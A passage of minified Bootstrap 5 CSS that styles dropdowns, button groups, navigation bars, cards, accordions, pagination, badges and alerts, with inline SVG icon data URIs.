var(--bs-dropdown-item-padding-x);clear:both;font-weight:400;color:var(--bs-dropdown-link-color);text-align:inherit;text-decoration:none;white-space:nowrap;background-color:transparent;border:0}.dropdown-item:focus,.dropdown-item:hover{color:var(--bs-dropdown-link-hover-color);background-color:var(--bs-dropdown-link-hover-bg)}.dropdown-item.active,.dropdown-item:active{color:var(--bs-dropdown-link-active-color);text-decoration:none;background-color:var(--bs-dropdown-link-active-bg)}.dropdown-item.disabled,.dropdown-item:disabled{color:var(--bs-dropdown-link-disabled-color);pointer-events:none;background-color:transparent}.dropdown-menu.show{display:block}.dropdown-header{display:block;padding:var(--bs-dropdown-header-padding-y) var(--bs-dropdown-header-padding-x);margin-bottom:0;font-size:.875rem;color:var(--bs-dropdown-header-color);white-space:nowrap}.dropdown-item-text{display:block;padding:var(--bs-dropdown-item-padding-y) var(--bs-dropdown-item-padding-x);color:var(--bs-dropdown-link-color)}.dropdown-menu-dark{--bs-dropdown-color:#dee2e6;--bs-dropdown-bg:#343a40;--bs-dropdown-border-color:var(--bs-border-color-translucent);--bs-dropdown-box-shadow: ;--bs-dropdown-link-color:#dee2e6;--bs-dropdown-link-hover-color:#fff;--bs-dropdown-divider-bg:var(--bs-border-color-translucent);--bs-dropdown-link-hover-bg:rgba(255, 255, 255, 0.15);--bs-dropdown-link-active-color:#fff;--bs-dropdown-link-active-bg:#0d6efd;--bs-dropdown-link-disabled-color:#adb5bd;--bs-dropdown-header-color:#adb5bd}.btn-group,.btn-group-vertical{position:relative;display:inline-flex;vertical-align:middle}.btn-group-vertical>.btn,.btn-group>.btn{position:relative;flex:1 1 auto}.btn-group-vertical>.btn-check:checked+.btn,.btn-group-vertical>.btn-check:focus+.btn,.btn-group-vertical>.btn.active,.btn-group-vertical>.btn:active,.btn-group-vertical>.btn:focus,.btn-group-vertical>.btn:hover,.btn-group>.btn-check:checked+.btn,.btn-group>.btn-check:focus+.btn,.btn-group>.btn.active,.btn-group>.btn:active,.btn-group>.btn:focus,.btn-group>.btn:hover{z-index:1}.btn-toolbar{display:flex;flex-wrap:wrap;justify-content:flex-start}.btn-toolbar .input-group{width:auto}.btn-group{border-radius:.375rem}.btn-group>.btn-group:not(:first-child),.btn-group>:not(.btn-check:first-child)+.btn{margin-left:-1px}.btn-group>.btn-group:not(:last-child)>.btn,.btn-group>.btn.dropdown-toggle-split:first-child,.btn-group>.btn:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn-group:not(:first-child)>.btn,.btn-group>.btn:nth-child(n+3),.btn-group>:not(.btn-check)+.btn{border-top-left-radius:0;border-bottom-left-radius:0}.dropdown-toggle-split{padding-right:.5625rem;padding-left:.5625rem}.dropdown-toggle-split::after,.dropend .dropdown-toggle-split::after,.dropup .dropdown-toggle-split::after{margin-left:0}.dropstart .dropdown-toggle-split::before{margin-right:0}.btn-group-sm>.btn+.dropdown-toggle-split,.btn-sm+.dropdown-toggle-split{padding-right:.375rem;padding-left:.375rem}.btn-group-lg>.btn+.dropdown-toggle-split,.btn-lg+.dropdown-toggle-split{padding-right:.75rem;padding-left:.75rem}.btn-group-vertical{flex-direction:column;align-items:flex-start;justify-content:center}.btn-group-vertical>.btn,.btn-group-vertical>.btn-group{width:100%}.btn-group-vertical>.btn-group:not(:first-child),.btn-group-vertical>.btn:not(:first-child){margin-top:-1px}.btn-group-vertical>.btn-group:not(:last-child)>.btn,.btn-group-vertical>.btn:not(:last-child):not(.dropdown-toggle){border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn-group:not(:first-child)>.btn,.btn-group-vertical>.btn~.btn{border-top-left-radius:0;border-top-right-radius:0}.nav{--bs-nav-link-padding-x:1rem;--bs-nav-link-padding-y:0.5rem;--bs-nav-link-font-weight: ;--bs-nav-link-color:var(--bs-link-color);--bs-nav-link-hover-color:var(--bs-link-hover-color);--bs-nav-link-disabled-color:#6c757d;display:flex;flex-wrap:wrap;padding-left:0;margin-bottom:0;list-style:none}.nav-link{display:block;padding:var(--bs-nav-link-padding-y) var(--bs-nav-link-padding-x);font-size:var(--bs-nav-link-font-size);font-weight:var(--bs-nav-link-font-weight);color:var(--bs-nav-link-color);text-decoration:none;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out}@media (prefers-reduced-motion:reduce){.nav-link{transition:none}}.nav-link:focus,.nav-link:hover{color:var(--bs-nav-link-hover-color)}.nav-link.disabled{color:var(--bs-nav-link-disabled-color);pointer-events:none;cursor:default}.nav-tabs{--bs-nav-tabs-border-width:1px;--bs-nav-tabs-border-color:#dee2e6;--bs-nav-tabs-border-radius:0.375rem;--bs-nav-tabs-link-hover-border-color:#e9ecef #e9ecef #dee2e6;--bs-nav-tabs-link-active-color:#495057;--bs-nav-tabs-link-active-bg:#fff;--bs-nav-tabs-link-active-border-color:#dee2e6 #dee2e6 #fff;border-bottom:var(--bs-nav-tabs-border-width) solid var(--bs-nav-tabs-border-color)}.nav-tabs .nav-link{margin-bottom:calc(-1 * var(--bs-nav-tabs-border-width));background:0 0;border:var(--bs-nav-tabs-border-width) solid transparent;border-top-left-radius:var(--bs-nav-tabs-border-radius);border-top-right-radius:var(--bs-nav-tabs-border-radius)}.nav-tabs .nav-link:focus,.nav-tabs .nav-link:hover{isolation:isolate;border-color:var(--bs-nav-tabs-link-hover-border-color)}.nav-tabs .nav-link.disabled,.nav-tabs .nav-link:disabled{color:var(--bs-nav-link-disabled-color);background-color:transparent;border-color:transparent}.nav-tabs .nav-item.show .nav-link,.nav-tabs .nav-link.active{color:var(--bs-nav-tabs-link-active-color);background-color:var(--bs-nav-tabs-link-active-bg);border-color:var(--bs-nav-tabs-link-active-border-color)}.nav-tabs .dropdown-menu{margin-top:calc(-1 * var(--bs-nav-tabs-border-width));border-top-left-radius:0;border-top-right-radius:0}.nav-pills{--bs-nav-pills-border-radius:0.375rem;--bs-nav-pills-link-active-color:#fff;--bs-nav-pills-link-active-bg:#0d6efd}.nav-pills .nav-link{background:0 0;border:0;border-radius:var(--bs-nav-pills-border-radius)}.nav-pills .nav-link:disabled{color:var(--bs-nav-link-disabled-color);background-color:transparent;border-color:transparent}.nav-pills .nav-link.active,.nav-pills .show>.nav-link{color:var(--bs-nav-pills-link-active-color);background-color:var(--bs-nav-pills-link-active-bg)}.nav-fill .nav-item,.nav-fill>.nav-link{flex:1 1 auto;text-align:center}.nav-justified .nav-item,.nav-justified>.nav-link{flex-basis:0;flex-grow:1;text-align:center}.nav-fill .nav-item .nav-link,.nav-justified .nav-item .nav-link{width:100%}.tab-content>.tab-pane{display:none}.tab-content>.active{display:block}.navbar{--bs-navbar-padding-x:0;--bs-navbar-padding-y:0.5rem;--bs-navbar-color:rgba(0, 0, 0, 0.55);--bs-navbar-hover-color:rgba(0, 0, 0, 0.7);--bs-navbar-disabled-color:rgba(0, 0, 0, 0.3);--bs-navbar-active-color:rgba(0, 0, 0, 0.9);--bs-navbar-brand-padding-y:0.3125rem;--bs-navbar-brand-margin-end:1rem;--bs-navbar-brand-font-size:1.25rem;--bs-navbar-brand-color:rgba(0, 0, 0, 0.9);--bs-navbar-brand-hover-color:rgba(0, 0, 0, 0.9);--bs-navbar-nav-link-padding-x:0.5rem;--bs-navbar-toggler-padding-y:0.25rem;--bs-navbar-toggler-padding-x:0.75rem;--bs-navbar-toggler-font-size:1.25rem;--bs-navbar-toggler-icon-bg:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3e%3cpath stroke='rgba%280, 0, 0, 0.55%29' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e");--bs-navbar-toggler-border-color:rgba(0, 0, 0, 0.1);--bs-navbar-toggler-border-radius:0.375rem;--bs-navbar-toggler-focus-width:0.25rem;--bs-navbar-toggler-transition:box-shadow 0.15s ease-in-out;position:relative;display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between;padding:var(--bs-navbar-padding-y) var(--bs-navbar-padding-x)}.navbar>.container,.navbar>.container-fluid,.navbar>.container-lg,.navbar>.container-md,.navbar>.container-sm,.navbar>.container-xl,.navbar>.container-xxl{display:flex;flex-wrap:inherit;align-items:center;justify-content:space-between}.navbar-brand{padding-top:var(--bs-navbar-brand-padding-y);padding-bottom:var(--bs-navbar-brand-padding-y);margin-right:var(--bs-navbar-brand-margin-end);font-size:var(--bs-navbar-brand-font-size);color:var(--bs-navbar-brand-color);text-decoration:none;white-space:nowrap}.navbar-brand:focus,.navbar-brand:hover{color:var(--bs-navbar-brand-hover-color)}.navbar-nav{--bs-nav-link-padding-x:0;--bs-nav-link-padding-y:0.5rem;--bs-nav-link-font-weight: ;--bs-nav-link-color:var(--bs-navbar-color);--bs-nav-link-hover-color:var(--bs-navbar-hover-color);--bs-nav-link-disabled-color:var(--bs-navbar-disabled-color);display:flex;flex-direction:column;padding-left:0;margin-bottom:0;list-style:none}.navbar-nav .nav-link.active,.navbar-nav .show>.nav-link{color:var(--bs-navbar-active-color)}.navbar-nav .dropdown-menu{position:static}.navbar-text{padding-top:.5rem;padding-bottom:.5rem;color:var(--bs-navbar-color)}.navbar-text a,.navbar-text a:focus,.navbar-text a:hover{color:var(--bs-navbar-active-color)}.navbar-collapse{flex-basis:100%;flex-grow:1;align-items:center}.navbar-toggler{padding:var(--bs-navbar-toggler-padding-y) var(--bs-navbar-toggler-padding-x);font-size:var(--bs-navbar-toggler-font-size);line-height:1;color:var(--bs-navbar-color);background-color:transparent;border:var(--bs-border-width) solid var(--bs-navbar-toggler-border-color);border-radius:var(--bs-navbar-toggler-border-radius);transition:var(--bs-navbar-toggler-transition)}@media (prefers-reduced-motion:reduce){.navbar-toggler{transition:none}}.navbar-toggler:hover{text-decoration:none}.navbar-toggler:focus{text-decoration:none;outline:0;box-shadow:0 0 0 var(--bs-navbar-toggler-focus-width)}.navbar-toggler-icon{display:inline-block;width:1.5em;height:1.5em;vertical-align:middle;background-image:var(--bs-navbar-toggler-icon-bg);background-repeat:no-repeat;background-position:center;background-size:100%}.navbar-nav-scroll{max-height:var(--bs-scroll-height,75vh);overflow-y:auto}@media (min-width:576px){.navbar-expand-sm{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-sm .navbar-nav{flex-direction:row}.navbar-expand-sm .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-sm .navbar-nav .nav-link{padding-right:var(--bs-navbar-nav-link-padding-x);padding-left:var(--bs-navbar-nav-link-padding-x)}.navbar-expand-sm .navbar-nav-scroll{overflow:visible}.navbar-expand-sm .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-sm .navbar-toggler{display:none}.navbar-expand-sm .offcanvas{position:static;z-index:auto;flex-grow:1;width:auto!important;height:auto!important;visibility:visible!important;background-color:transparent!important;border:0!important;transform:none!important;transition:none}.navbar-expand-sm .offcanvas .offcanvas-header{display:none}.navbar-expand-sm .offcanvas .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible}}@media (min-width:768px){.navbar-expand-md{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-md .navbar-nav{flex-direction:row}.navbar-expand-md .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-md .navbar-nav .nav-link{padding-right:var(--bs-navbar-nav-link-padding-x);padding-left:var(--bs-navbar-nav-link-padding-x)}.navbar-expand-md .navbar-nav-scroll{overflow:visible}.navbar-expand-md .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-md .navbar-toggler{display:none}.navbar-expand-md .offcanvas{position:static;z-index:auto;flex-grow:1;width:auto!important;height:auto!important;visibility:visible!important;background-color:transparent!important;border:0!important;transform:none!important;transition:none}.navbar-expand-md .offcanvas .offcanvas-header{display:none}.navbar-expand-md .offcanvas .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible}}@media (min-width:992px){.navbar-expand-lg{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-lg .navbar-nav{flex-direction:row}.navbar-expand-lg .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-lg .navbar-nav .nav-link{padding-right:var(--bs-navbar-nav-link-padding-x);padding-left:var(--bs-navbar-nav-link-padding-x)}.navbar-expand-lg .navbar-nav-scroll{overflow:visible}.navbar-expand-lg .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-lg .navbar-toggler{display:none}.navbar-expand-lg .offcanvas{position:static;z-index:auto;flex-grow:1;width:auto!important;height:auto!important;visibility:visible!important;background-color:transparent!important;border:0!important;transform:none!important;transition:none}.navbar-expand-lg .offcanvas .offcanvas-header{display:none}.navbar-expand-lg .offcanvas .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible}}@media (min-width:1200px){.navbar-expand-xl{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-xl .navbar-nav{flex-direction:row}.navbar-expand-xl .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-xl .navbar-nav .nav-link{padding-right:var(--bs-navbar-nav-link-padding-x);padding-left:var(--bs-navbar-nav-link-padding-x)}.navbar-expand-xl .navbar-nav-scroll{overflow:visible}.navbar-expand-xl .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-xl .navbar-toggler{display:none}.navbar-expand-xl .offcanvas{position:static;z-index:auto;flex-grow:1;width:auto!important;height:auto!important;visibility:visible!important;background-color:transparent!important;border:0!important;transform:none!important;transition:none}.navbar-expand-xl .offcanvas .offcanvas-header{display:none}.navbar-expand-xl .offcanvas .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible}}@media (min-width:1400px){.navbar-expand-xxl{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-xxl .navbar-nav{flex-direction:row}.navbar-expand-xxl .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-xxl .navbar-nav .nav-link{padding-right:var(--bs-navbar-nav-link-padding-x);padding-left:var(--bs-navbar-nav-link-padding-x)}.navbar-expand-xxl .navbar-nav-scroll{overflow:visible}.navbar-expand-xxl .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-xxl .navbar-toggler{display:none}.navbar-expand-xxl .offcanvas{position:static;z-index:auto;flex-grow:1;width:auto!important;height:auto!important;visibility:visible!important;background-color:transparent!important;border:0!important;transform:none!important;transition:none}.navbar-expand-xxl .offcanvas .offcanvas-header{display:none}.navbar-expand-xxl .offcanvas .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible}}.navbar-expand{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand .navbar-nav{flex-direction:row}.navbar-expand .navbar-nav .dropdown-menu{position:absolute}.navbar-expand .navbar-nav .nav-link{padding-right:var(--bs-navbar-nav-link-padding-x);padding-left:var(--bs-navbar-nav-link-padding-x)}.navbar-expand .navbar-nav-scroll{overflow:visible}.navbar-expand .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand .navbar-toggler{display:none}.navbar-expand .offcanvas{position:static;z-index:auto;flex-grow:1;width:auto!important;height:auto!important;visibility:visible!important;background-color:transparent!important;border:0!important;transform:none!important;transition:none}.navbar-expand .offcanvas .offcanvas-header{display:none}.navbar-expand .offcanvas .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible}.navbar-dark{--bs-navbar-color:rgba(255, 255, 255, 0.55);--bs-navbar-hover-color:rgba(255, 255, 255, 0.75);--bs-navbar-disabled-color:rgba(255, 255, 255, 0.25);--bs-navbar-active-color:#fff;--bs-navbar-brand-color:#fff;--bs-navbar-brand-hover-color:#fff;--bs-navbar-toggler-border-color:rgba(255, 255, 255, 0.1);--bs-navbar-toggler-icon-bg:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3e%3cpath stroke='rgba%28255, 255, 255, 0.55%29' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e")}.card{--bs-card-spacer-y:1rem;--bs-card-spacer-x:1rem;--bs-card-title-spacer-y:0.5rem;--bs-card-border-width:1px;--bs-card-border-color:var(--bs-border-color-translucent);--bs-card-border-radius:0.375rem;--bs-card-box-shadow: ;--bs-card-inner-border-radius:calc(0.375rem - 1px);--bs-card-cap-padding-y:0.5rem;--bs-card-cap-padding-x:1rem;--bs-card-cap-bg:rgba(0, 0, 0, 0.03);--bs-card-cap-color: ;--bs-card-height: ;--bs-card-color: ;--bs-card-bg:#fff;--bs-card-img-overlay-padding:1rem;--bs-card-group-margin:0.75rem;position:relative;display:flex;flex-direction:column;min-width:0;height:var(--bs-card-height);word-wrap:break-word;background-color:var(--bs-card-bg);background-clip:border-box;border:var(--bs-card-border-width) solid var(--bs-card-border-color);border-radius:var(--bs-card-border-radius)}.card>hr{margin-right:0;margin-left:0}.card>.list-group{border-top:inherit;border-bottom:inherit}.card>.list-group:first-child{border-top-width:0;border-top-left-radius:var(--bs-card-inner-border-radius);border-top-right-radius:var(--bs-card-inner-border-radius)}.card>.list-group:last-child{border-bottom-width:0;border-bottom-right-radius:var(--bs-card-inner-border-radius);border-bottom-left-radius:var(--bs-card-inner-border-radius)}.card>.card-header+.list-group,.card>.list-group+.card-footer{border-top:0}.card-body{flex:1 1 auto;padding:var(--bs-card-spacer-y) var(--bs-card-spacer-x);color:var(--bs-card-color)}.card-title{margin-bottom:var(--bs-card-title-spacer-y)}.card-subtitle{margin-top:calc(-.5 * var(--bs-card-title-spacer-y));margin-bottom:0}.card-text:last-child{margin-bottom:0}.card-link+.card-link{margin-left:var(--bs-card-spacer-x)}.card-header{padding:var(--bs-card-cap-padding-y) var(--bs-card-cap-padding-x);margin-bottom:0;color:var(--bs-card-cap-color);background-color:var(--bs-card-cap-bg);border-bottom:var(--bs-card-border-width) solid var(--bs-card-border-color)}.card-header:first-child{border-radius:var(--bs-card-inner-border-radius) var(--bs-card-inner-border-radius) 0 0}.card-footer{padding:var(--bs-card-cap-padding-y) var(--bs-card-cap-padding-x);color:var(--bs-card-cap-color);background-color:var(--bs-card-cap-bg);border-top:var(--bs-card-border-width) solid var(--bs-card-border-color)}.card-footer:last-child{border-radius:0 0 var(--bs-card-inner-border-radius) var(--bs-card-inner-border-radius)}.card-header-tabs{margin-right:calc(-.5 * var(--bs-card-cap-padding-x));margin-bottom:calc(-1 * var(--bs-card-cap-padding-y));margin-left:calc(-.5 * var(--bs-card-cap-padding-x));border-bottom:0}.card-header-tabs .nav-link.active{background-color:var(--bs-card-bg);border-bottom-color:var(--bs-card-bg)}.card-header-pills{margin-right:calc(-.5 * var(--bs-card-cap-padding-x));margin-left:calc(-.5 * var(--bs-card-cap-padding-x))}.card-img-overlay{position:absolute;top:0;right:0;bottom:0;left:0;padding:var(--bs-card-img-overlay-padding);border-radius:var(--bs-card-inner-border-radius)}.card-img,.card-img-bottom,.card-img-top{width:100%}.card-img,.card-img-top{border-top-left-radius:var(--bs-card-inner-border-radius);border-top-right-radius:var(--bs-card-inner-border-radius)}.card-img,.card-img-bottom{border-bottom-right-radius:var(--bs-card-inner-border-radius);border-bottom-left-radius:var(--bs-card-inner-border-radius)}.card-group>.card{margin-bottom:var(--bs-card-group-margin)}@media (min-width:576px){.card-group{display:flex;flex-flow:row wrap}.card-group>.card{flex:1 0 0%;margin-bottom:0}.card-group>.card+.card{margin-left:0;border-left:0}.card-group>.card:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.card-group>.card:not(:last-child) .card-header,.card-group>.card:not(:last-child) .card-img-top{border-top-right-radius:0}.card-group>.card:not(:last-child) .card-footer,.card-group>.card:not(:last-child) .card-img-bottom{border-bottom-right-radius:0}.card-group>.card:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.card-group>.card:not(:first-child) .card-header,.card-group>.card:not(:first-child) .card-img-top{border-top-left-radius:0}.card-group>.card:not(:first-child) .card-footer,.card-group>.card:not(:first-child) .card-img-bottom{border-bottom-left-radius:0}}.accordion{--bs-accordion-color:#212529;--bs-accordion-bg:#fff;--bs-accordion-transition:color 0.15s ease-in-out,background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out,border-radius 0.15s ease;--bs-accordion-border-color:var(--bs-border-color);--bs-accordion-border-width:1px;--bs-accordion-border-radius:0.375rem;--bs-accordion-inner-border-radius:calc(0.375rem - 1px);--bs-accordion-btn-padding-x:1.25rem;--bs-accordion-btn-padding-y:1rem;--bs-accordion-btn-color:#212529;--bs-accordion-btn-bg:var(--bs-accordion-bg);--bs-accordion-btn-icon:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23212529'%3e%3cpath fill-rule='evenodd' d='M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z'/%3e%3c/svg%3e");--bs-accordion-btn-icon-width:1.25rem;--bs-accordion-btn-icon-transform:rotate(-180deg);--bs-accordion-btn-icon-transition:transform 0.2s ease-in-out;--bs-accordion-btn-active-icon:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%230c63e4'%3e%3cpath fill-rule='evenodd' d='M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z'/%3e%3c/svg%3e");--bs-accordion-btn-focus-border-color:#86b7fe;--bs-accordion-btn-focus-box-shadow:0 0 0 0.25rem rgba(13, 110, 253, 0.25);--bs-accordion-body-padding-x:1.25rem;--bs-accordion-body-padding-y:1rem;--bs-accordion-active-color:#0c63e4;--bs-accordion-active-bg:#e7f1ff}.accordion-button{position:relative;display:flex;align-items:center;width:100%;padding:var(--bs-accordion-btn-padding-y) var(--bs-accordion-btn-padding-x);font-size:1rem;color:var(--bs-accordion-btn-color);text-align:left;background-color:var(--bs-accordion-btn-bg);border:0;border-radius:0;overflow-anchor:none;transition:var(--bs-accordion-transition)}@media (prefers-reduced-motion:reduce){.accordion-button{transition:none}}.accordion-button:not(.collapsed){color:var(--bs-accordion-active-color);background-color:var(--bs-accordion-active-bg);box-shadow:inset 0 calc(-1 * var(--bs-accordion-border-width)) 0 var(--bs-accordion-border-color)}.accordion-button:not(.collapsed)::after{background-image:var(--bs-accordion-btn-active-icon);transform:var(--bs-accordion-btn-icon-transform)}.accordion-button::after{flex-shrink:0;width:var(--bs-accordion-btn-icon-width);height:var(--bs-accordion-btn-icon-width);margin-left:auto;content:"";background-image:var(--bs-accordion-btn-icon);background-repeat:no-repeat;background-size:var(--bs-accordion-btn-icon-width);transition:var(--bs-accordion-btn-icon-transition)}@media (prefers-reduced-motion:reduce){.accordion-button::after{transition:none}}.accordion-button:hover{z-index:2}.accordion-button:focus{z-index:3;border-color:var(--bs-accordion-btn-focus-border-color);outline:0;box-shadow:var(--bs-accordion-btn-focus-box-shadow)}.accordion-header{margin-bottom:0}.accordion-item{color:var(--bs-accordion-color);background-color:var(--bs-accordion-bg);border:var(--bs-accordion-border-width) solid var(--bs-accordion-border-color)}.accordion-item:first-of-type{border-top-left-radius:var(--bs-accordion-border-radius);border-top-right-radius:var(--bs-accordion-border-radius)}.accordion-item:first-of-type .accordion-button{border-top-left-radius:var(--bs-accordion-inner-border-radius);border-top-right-radius:var(--bs-accordion-inner-border-radius)}.accordion-item:not(:first-of-type){border-top:0}.accordion-item:last-of-type{border-bottom-right-radius:var(--bs-accordion-border-radius);border-bottom-left-radius:var(--bs-accordion-border-radius)}.accordion-item:last-of-type .accordion-button.collapsed{border-bottom-right-radius:var(--bs-accordion-inner-border-radius);border-bottom-left-radius:var(--bs-accordion-inner-border-radius)}.accordion-item:last-of-type .accordion-collapse{border-bottom-right-radius:var(--bs-accordion-border-radius);border-bottom-left-radius:var(--bs-accordion-border-radius)}.accordion-body{padding:var(--bs-accordion-body-padding-y) var(--bs-accordion-body-padding-x)}.accordion-flush .accordion-collapse{border-width:0}.accordion-flush .accordion-item{border-right:0;border-left:0;border-radius:0}.accordion-flush .accordion-item:first-child{border-top:0}.accordion-flush .accordion-item:last-child{border-bottom:0}.accordion-flush .accordion-item .accordion-button,.accordion-flush .accordion-item .accordion-button.collapsed{border-radius:0}.breadcrumb{--bs-breadcrumb-padding-x:0;--bs-breadcrumb-padding-y:0;--bs-breadcrumb-margin-bottom:1rem;--bs-breadcrumb-bg: ;--bs-breadcrumb-border-radius: ;--bs-breadcrumb-divider-color:#6c757d;--bs-breadcrumb-item-padding-x:0.5rem;--bs-breadcrumb-item-active-color:#6c757d;display:flex;flex-wrap:wrap;padding:var(--bs-breadcrumb-padding-y) var(--bs-breadcrumb-padding-x);margin-bottom:var(--bs-breadcrumb-margin-bottom);font-size:var(--bs-breadcrumb-font-size);list-style:none;background-color:var(--bs-breadcrumb-bg);border-radius:var(--bs-breadcrumb-border-radius)}.breadcrumb-item+.breadcrumb-item{padding-left:var(--bs-breadcrumb-item-padding-x)}.breadcrumb-item+.breadcrumb-item::before{float:left;padding-right:var(--bs-breadcrumb-item-padding-x);color:var(--bs-breadcrumb-divider-color);content:var(--bs-breadcrumb-divider, "/")}.breadcrumb-item.active{color:var(--bs-breadcrumb-item-active-color)}.pagination{--bs-pagination-padding-x:0.75rem;--bs-pagination-padding-y:0.375rem;--bs-pagination-font-size:1rem;--bs-pagination-color:var(--bs-link-color);--bs-pagination-bg:#fff;--bs-pagination-border-width:1px;--bs-pagination-border-color:#dee2e6;--bs-pagination-border-radius:0.375rem;--bs-pagination-hover-color:var(--bs-link-hover-color);--bs-pagination-hover-bg:#e9ecef;--bs-pagination-hover-border-color:#dee2e6;--bs-pagination-focus-color:var(--bs-link-hover-color);--bs-pagination-focus-bg:#e9ecef;--bs-pagination-focus-box-shadow:0 0 0 0.25rem rgba(13, 110, 253, 0.25);--bs-pagination-active-color:#fff;--bs-pagination-active-bg:#0d6efd;--bs-pagination-active-border-color:#0d6efd;--bs-pagination-disabled-color:#6c757d;--bs-pagination-disabled-bg:#fff;--bs-pagination-disabled-border-color:#dee2e6;display:flex;padding-left:0;list-style:none}.page-link{position:relative;display:block;padding:var(--bs-pagination-padding-y) var(--bs-pagination-padding-x);font-size:var(--bs-pagination-font-size);color:var(--bs-pagination-color);text-decoration:none;background-color:var(--bs-pagination-bg);border:var(--bs-pagination-border-width) solid var(--bs-pagination-border-color);transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.page-link{transition:none}}.page-link:hover{z-index:2;color:var(--bs-pagination-hover-color);background-color:var(--bs-pagination-hover-bg);border-color:var(--bs-pagination-hover-border-color)}.page-link:focus{z-index:3;color:var(--bs-pagination-focus-color);background-color:var(--bs-pagination-focus-bg);outline:0;box-shadow:var(--bs-pagination-focus-box-shadow)}.active>.page-link,.page-link.active{z-index:3;color:var(--bs-pagination-active-color);background-color:var(--bs-pagination-active-bg);border-color:var(--bs-pagination-active-border-color)}.disabled>.page-link,.page-link.disabled{color:var(--bs-pagination-disabled-color);pointer-events:none;background-color:var(--bs-pagination-disabled-bg);border-color:var(--bs-pagination-disabled-border-color)}.page-item:not(:first-child) .page-link{margin-left:-1px}.page-item:first-child .page-link{border-top-left-radius:var(--bs-pagination-border-radius);border-bottom-left-radius:var(--bs-pagination-border-radius)}.page-item:last-child .page-link{border-top-right-radius:var(--bs-pagination-border-radius);border-bottom-right-radius:var(--bs-pagination-border-radius)}.pagination-lg{--bs-pagination-padding-x:1.5rem;--bs-pagination-padding-y:0.75rem;--bs-pagination-font-size:1.25rem;--bs-pagination-border-radius:0.5rem}.pagination-sm{--bs-pagination-padding-x:0.5rem;--bs-pagination-padding-y:0.25rem;--bs-pagination-font-size:0.875rem;--bs-pagination-border-radius:0.25rem}.badge{--bs-badge-padding-x:0.65em;--bs-badge-padding-y:0.35em;--bs-badge-font-size:0.75em;--bs-badge-font-weight:700;--bs-badge-color:#fff;--bs-badge-border-radius:0.375rem;display:inline-block;padding:var(--bs-badge-padding-y) var(--bs-badge-padding-x);font-size:var(--bs-badge-font-size);font-weight:var(--bs-badge-font-weight);line-height:1;color:var(--bs-badge-color);text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:var(--bs-badge-border-radius)}.badge:empty{display:none}.btn .badge{position:relative;top:-1px}.alert{--bs-alert-bg:transparent;--bs-alert-padding-x:1rem;--bs-alert-padding-y:1rem;--bs-alert-margin-bottom:1rem;--bs-alert-color:inherit;--bs-alert-border-color:transparent;--bs-alert-border:1px solid var(--bs-alert-border-color);--bs-alert-border-radius:0.375rem;position:relative;padding:var(--bs-alert-padding-y) var(--bs-alert-padding-x);margin-bottom:var(--bs-alert-margin-bottom);color:var(--bs-alert-color);background-color:var(--bs-alert-bg);border:var(--bs-alert-border);border-radius:var(--bs-alert-border-radius)}.alert-heading{color:inherit}.alert-link{font-weight:700}.alert-dismissible{padding-right:3rem}.alert-dismissible .btn-close{position:absolute;top:0;right:0;z-index:2;padding:1.25rem 1rem}.alert-primary{--bs-alert-color:#084298;--bs-alert-bg:#cfe2ff;--bs-alert-border-color:#b6d4fe}.alert-primary .alert-link{color:#06357a}.alert-secondary{--bs-alert-color:#41464b;--bs-alert-bg:#e2e3e5;--bs-alert-border-color:#d3d6d8}.alert-secondary .alert-link{color:#34383c}.alert-success{--bs-alert-color:#0f5132;--bs-alert-bg:#d1e7dd;--bs-alert-border-color:#badbcc}.alert-success .alert-link{color:#0c4128}.alert-info{--bs-alert-color:#055160;--bs-alert-bg:#cff4fc;--bs-alert-border-color:#b6effb}.alert-info 